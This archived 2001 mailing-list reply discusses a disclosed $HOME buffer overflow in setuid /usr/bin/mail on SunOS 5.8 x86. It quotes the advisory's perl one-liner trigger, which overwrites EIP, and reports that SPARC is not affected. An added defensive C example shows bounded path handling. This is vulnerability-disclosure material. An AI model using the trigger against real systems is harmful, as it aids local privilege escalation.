Re: $HOME buffer overflow in SunOS 5.8 x86

From: Juergen P. Meier (jpmat_private)
Date: Tue Jun 05 2001 - 06:33:05 PDT


    On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
    > $HOME buffer overflow in SunOS 5.8 x86
    > Systems affected:
    > SunOS 5.8 x86 have not tested on other OSes
    > Risk: Medium
    > Date: 4 June 2001
    > 
    > Details:
    > HOME=`perl -e 'print "A"x1100'` ; export HOME
    > mail a
    > CTL-C
    > eip gets smashed with 0x41414141.
    
    0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
    0:jpmeier@sol:/home/jpmeier> mail a
    ^Cmail: Mail saved in dead.letter
    1:jpmeier@sol:/home/jpmeier> uname -a
    SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
    
    Also tried larger buffers.
    
    Solaris/sparc appears not vulnerable. Maybe it's an x86 bug only.
     
    > Workaround:
    > chmod -s /usr/bin/mail
    > Vendor status:
    > Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.
    
    juergen
    
    -- 
    Juergen P. Meier			email: jpmat_private
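
An added example, not part of either post and not Sun's code: a bounded way for a set-id program to build a path from `$HOME`, which fails closed on the 1100-byte value used in the report. Neither post says where in `mail` the overflow occurs; the `dead.letter` path, the helper names and the 1024-byte buffer size are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEAD_PATH_MAX 1024   /* assumed buffer size, for illustration only */

/* Hypothetical helper: build "<home>/dead.letter" in out[outlen].
 * Returns 0 on success, -1 if home is unset, not absolute, or too long.
 * Never writes past out[outlen - 1]; on failure out is an empty string. */
int dead_letter_path(const char *home, char *out, size_t outlen)
{
    int n;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] != '/')      /* untrusted env: sanity-check */
        return -1;
    n = snprintf(out, outlen, "%s/dead.letter", home);
    if (n < 0 || (size_t)n >= outlen) {      /* would truncate: refuse it */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed input: '/' plus 1100 'A' bytes, so the length check (not the
 * absolute-path check) is what rejects it. */
int check_oversized_home(void)
{
    char home[1102], path[DEAD_PATH_MAX];

    home[0] = '/';
    memset(home + 1, 'A', 1100);
    home[1101] = '\0';
    return dead_letter_path(home, path, sizeof path);
}

int main(void)
{
    char path[DEAD_PATH_MAX];

    if (dead_letter_path(getenv("HOME"), path, sizeof path) != 0) {
        fprintf(stderr, "HOME unusable, not saving dead.letter\n");
        return 1;
    }
    printf("would save to %s\n", path);
    return 0;
}
```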
    



    This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 11:20:15 PDT